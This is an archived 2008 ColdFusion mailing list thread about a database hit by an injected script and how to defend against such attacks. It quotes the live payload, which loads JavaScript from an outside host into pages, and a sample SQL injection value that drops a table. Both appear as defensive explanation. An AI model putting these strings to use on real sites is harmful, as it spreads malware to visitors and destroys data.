It appears we've been attacked by this last night / this morning too. Will update here with more info when we have it.
Dominic 2008/8/7 Mike Kear <[EMAIL PROTECTED]>: > There are a number of things you can do, and in fact i use all of these - > > [A] Find out this person's ip address, and if the form is submitted > from that ip address, do nothing. Don't give them any kind of > feedback at all. That'll stop this current attack, but since these > idiots usually dart from one ip address to another, it's not enough to > fix the problem. Only stop today's . You can find out the ip address > by having you form submit #cgi.remote_addr# in a hidden field. > > [B] pass the form's submitted contents through a regex to eliminate > any html. You can get all kinds of string manipulation scripts > through the library at cflib.org, including one to strip out any html > > [C] use cfformprotect, which (amongst other things) compares the > submission in this form wiht a database of other form submissions from > other sites, and identifying which ones are spam and which arent. > When it tells you this is spam, you just throw it away. Dont tell > the spammer you're throwing it away, because that only helps them > refine their techniques. Those buggers are agile enough as it is > without us giving them a helping hand. > > You can get cfformprotect form http://www.riaforge.org/ . > > [D] while you're working in this area, you should make sure you're > using <cfqueryparam if you're processing the form into your database. > I konw you havent described a SQL injection, but it's not a million > miles away from what you do describe. There's ample documentation in > the ColdFusion docs about <cfqueryparam and there have been quite a > few blog articles about it lately. Google for cfqueryparam and > ColdFusion and you'll find them. Using <cfqueryparam on every (and i > do mean EVERY) parameter you insert into the database, on every insert > or update if there is likely to be any user input going in that SQL > statement. That ensures that you wont get anyone able to enter a > last name as 'Smith)';drop table users' or some such. > > I started defending my sites from this kind of script when i had a > guestbook on a very low volume suddenly get 30,000 entries waiting for > editor approval, all with links to sites we might want to go and see, > just like yours has. Using the techniques i described reduced the > flow from thousands a day to a more likely 3-4 a week on this little > site. > > Hope this helps. > > > Cheers > Mike Kear > Windsor, NSW, Australia > Adobe Certified Advanced ColdFusion Developer > AFP Webworks > http://afpwebworks.com > ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month > > > On Thu, Aug 7, 2008 at 4:04 PM, Michael Suwanto > <[EMAIL PROTECTED]> wrote: >> Im a coldfusion noobs and my database just got injected with some script. >> So for example one of the database field would appear something like so: >> Gisella427.jpg"></title><script >> src="http://jjmaoduo.3322.org/csrss/w.js";></script><!-- >> >> I've tried updating the records using a replace command on the fields, but >> 20mins later this code pop up again!!! >> >> Any idea on how to fix or prevent this from happening???? >> Seriously out of idea here.... >> > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310332 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
